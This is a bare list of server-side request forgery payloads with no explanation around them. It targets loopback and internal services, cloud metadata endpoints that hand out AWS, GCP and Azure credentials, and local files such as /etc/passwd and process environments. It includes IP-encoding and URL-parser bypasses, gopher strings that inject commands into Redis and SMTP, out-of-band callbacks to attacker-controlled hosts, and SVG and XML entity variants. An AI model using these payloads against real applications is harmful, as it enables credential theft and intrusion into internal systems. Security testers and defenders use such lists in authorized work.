Server-side request forgery payloads — internal targets, cloud metadata (AWS/GCP/Azure), IP-encoding and parser-confusion bypasses, protocol smuggling (gopher/file/dict) and blind/parser-driven SSRF.
http://127.0.0.1/
http://localhost:6379/
http://127.0.0.1:9200/_cat/indices
http://[::1]/
http://0.0.0.0:8080/
http://[email protected]/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE
http://169.254.169.254/latest/api/token
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://2130706433/
http://0x7f000001/
http://0177.0.0.1/
http://127.1/
http://[::ffff:127.0.0.1]/
http://127.0.0.1.nip.io/
http://[email protected]/
http://127.0.0.1#@expected.com/
http://expected.com\@169.254.169.254/
http://10.10.14.1/redir (302 -> http://169.254.169.254/)
http://allowed.target.com.attacker.com/
file:///etc/passwd
file:///proc/self/environ
dict://127.0.0.1:11211/stats
gopher://127.0.0.1:6379/_SET%20k%20v%0D%0A
gopher://127.0.0.1:25/_HELO%20x%0D%0A
http://YOUR-ID.oast.fun/
http://10.10.14.1/ssrf
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="http://169.254.169.254/latest/meta-data/"/></svg>
<!DOCTYPE x [<!ENTITY e SYSTEM "http://169.254.169.254/">]><x>&e;</x>